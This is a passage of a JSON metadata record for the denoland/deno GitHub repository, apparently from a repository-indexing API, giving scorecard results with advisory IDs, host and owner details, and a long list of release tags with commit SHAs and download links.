analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/rel